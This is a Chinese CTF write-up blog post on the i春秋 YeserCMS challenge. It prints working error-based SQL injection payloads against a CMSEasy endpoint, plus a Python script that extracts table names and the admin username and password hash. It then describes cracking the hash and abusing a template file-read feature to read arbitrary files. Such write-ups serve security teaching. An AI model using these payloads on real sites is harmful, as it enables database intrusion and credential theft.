美文网首页
i春秋CTF-YeserCMS

i春秋CTF-YeserCMS

作者: V0W | 来源:发表于2018-09-06 18:21 被阅读0次

分析

打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS

于是百度EasyCMS的漏洞,发现cmseasy 无限制报错注入(可获取全站信息exp)

访问url/celive/live/header.php,直接进行报错注入

数据库:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>


# 结果:
XPATH syntax error: '[Yeser]'

INSERT INTO `yesercms_detail` (`chatid`,`detail`,`who_witter`) VALUES('','xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- (2018-09-06 17:06:08)','2')

数据表:

这里需要注意一下:group_concat取数据的32位,因此不能完全爆出数据表,需要调整1,32才行

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>


# 结果
XPATH syntax error: '[yesercms_a_attachment,yesercms_'

## python脚本跑一下
import requests
url = 'http://e32e8eceff7a4e3f922fe2640f1c82a67a059c73c2f44c14.game.ichunqiu.com/celive/live/header.php'
for i in range(1,999,31):
    postdata = {
    'xajax':'Postdata',
    'xajaxargs[0]':"<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),%s,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>" %str(i)
}
    r = requests.post(url,data=postdata)
    print r.content[22:53]

简单的python,循环跑一下,也是可以出来的,但是表太多了,我是不太知道大佬们怎么精准定位到yesercms_user

yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yesercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_detail,yesercms_event,yesercms_friendlink,yesercms_guestbook,yesercms_linkword,yesercms_my_a,yesercms_my_yingpin,yesercms_operators,yesercms_option,yesercms_p_orders,yesercms_p_pay,yesercms_p_shipping,yesercms_pay_exchange,yesercms_sessions,yesercms_settings,yesercms_templatetag,yesercms_type,yesercms_union,yesercms_union_pay,yesercms_union_visit,yesercms_user,yesercms_usergroup

最后爆出数据:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

XPATH syntax error: '[admin|ff512d4240cbbdeafada404677ccbe61]'

这里也是一样,只会显示32位字符,需要调整一下,得到账户密码。

MD5反解密码SOMD5Yeser231

进入后台页面,


想着通过上传图片拿shell,但是发现根本不存在这个类

于是想在当前模板中插入一个木马拿shell,结果保存不了!!

看了别人的WP,发现原来调用当前模板的时候用的是读文件的函数,也就是说,可以利用这个对文件的函数读取任意文件:

更改id 用于读flag,发现可行,getFlag。

知识点

报错注入
EasyCMS 漏洞
读取文件函数的利用

相关文章

  • i春秋CTF-YeserCMS

    分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmsea...

  • 戏说春秋_i春秋 writeup

    《戏说春秋》第一关 图穷匕见 题目: 解:用winhex打开,拉到最后可发现一段编码 放到解密网站上解码。 《戏说...

  • [i春秋]Web

    “百度杯”CTF比赛 2017 二月场_爆破-1 题目内容:flag就在某六位变量中。 打开页面给出了源代码: 看...

  • i春秋writeup

    1.sql 题目地址http://baabb3c37fcb429b9a2a71dbe623a29ee49724ec...

  • i春秋CTF Upload

    分析 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开fl...

  • i春秋 ctf web

    爆破-1 全局变量$GLOBALS?hello=GLOBALS 爆破-2 命令注入?hello=);show_so...

  • i春秋端午摸鱼

    https://bbs.ichunqiu.com/thread-41874-1-1.html抱了大佬的大腿……哭哭...

  • i春秋web 练习

    百度杯”CTF比赛 九月场 1.web sqli 解题:https://blog.csdn.net/qq_3444...

  • i春秋圣诞欢乐赛

    web1 web签到题竟然是个misc题。。。。 web2 打开页面提示 百度一波使用vi或vim命令打开一个文件...

  • Misc : Corrupt Transmission

    题目介绍 题目来源:I春秋题目类型:图片修复下载链接:https://static2.ichunqiu.com/i...

网友评论

      本文标题:i春秋CTF-YeserCMS

      本文链接:https://www.haomeiwen.com/subject/exxfgftx.html